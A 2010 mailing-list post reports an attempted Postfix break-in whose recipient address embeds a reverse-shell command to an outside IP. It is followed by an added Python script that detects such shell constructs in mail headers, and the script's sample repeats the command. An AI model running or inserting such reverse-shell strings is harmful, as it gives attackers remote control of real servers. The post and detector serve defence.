[bitfolk] Security - not just SSH

Author: Alastair Sherringham
Date:  
To: BitFolk Users
Subject: [bitfolk] Security - not just SSH
Hello Folks,

With all the talk about SSH security, it is also shocking to see the
break-in attempts made on other services e.g. httpd and smtpd.

The httpd ones are often mod_proxy or PHP/phpMyAdmin attempts (no PHP
here), but an odd record in the Postfix log today was a little
different:

X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0 2>&0"
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"@calliope.bitfolk
Received: from bluedick (debian01.vservers.at [194.106.206.7])
by calliope (Postfix) with SMTP id F1B31DC001
for <"root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0">; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
Message-Id: <20100317225313.F1B31DC001@calliope>
Date: Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
From: blue@???
To: undisclosed-recipients:;


I assume some sort of attempt to break Postfix. This message was
delivered to the "root" mailbox (no content).

Scary place the internet sometimes ....

Cheers,


-- 
Alastair Sherringham
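
The headers quoted in the message above carry a shell command inside the recipient address. As an added example (not part of the original post), this Python script rejoins folded header lines and flags address fields containing shell constructs; the rule names, the sample headers, and the 192.0.2.10 and mail.example values are constructed for illustration.

```python
import re

# Fields of a delivered message that carry recipient addresses.
ADDRESS_FIELDS = {"x-original-to", "delivered-to", "to", "cc", "received"}

# Constructs that do not belong in a recipient address (rule names are this example's own).
SUSPICIOUS = {
    "pipe-to-command": re.compile(r"\|\s*\S"),
    "dev-tcp-redirect": re.compile(r"/dev/(tcp|udp)/"),
    "command-substitution": re.compile(r"\$\(|`"),
    "shell-path": re.compile(r"/bin/(ba|da|k|z)?sh\b"),
}
HEADER_START = re.compile(r"^([A-Za-z0-9-]+):[ \t]*(.*)$")

def unfold(raw):
    """Return [(lowercased name, value)] with folded header lines rejoined.
    A line that does not start a new "Name:" field is treated as a continuation,
    which also covers archives that strip the leading whitespace of folds."""
    fields = []
    for line in raw.splitlines():
        if not line.strip():
            break  # a blank line ends the header block
        m = None if line[0] in " \t" else HEADER_START.match(line)
        if m:
            fields.append([m.group(1).lower(), m.group(2)])
        elif fields:
            fields[-1][1] += " " + line.strip()
    return [(name, value) for name, value in fields]

def scan_headers(raw):
    """Return [(field, [matched rule names])] for suspicious address fields."""
    findings = []
    for name, value in unfold(raw):
        if name in ADDRESS_FIELDS:
            hits = [rule for rule, rx in SUSPICIOUS.items() if rx.search(value)]
            if hits:
                findings.append((name, hits))
    return findings

# Constructed sample modelled on the headers above (documentation address 192.0.2.10).
SAMPLE = '''X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/192.0.2.10/9991 1>&0 2>&0"
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/192.0.2.10/9991 1>&0
2>&0"@mail.example
Received: from client (client.example [192.0.2.10])
by mail (Postfix) with SMTP id 0000000000
for <alice@mail.example>; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
To: undisclosed-recipients:;
'''

if __name__ == "__main__":
    for field, rules in scan_headers(SAMPLE):
        print(f"{field}: {', '.join(rules)}")
```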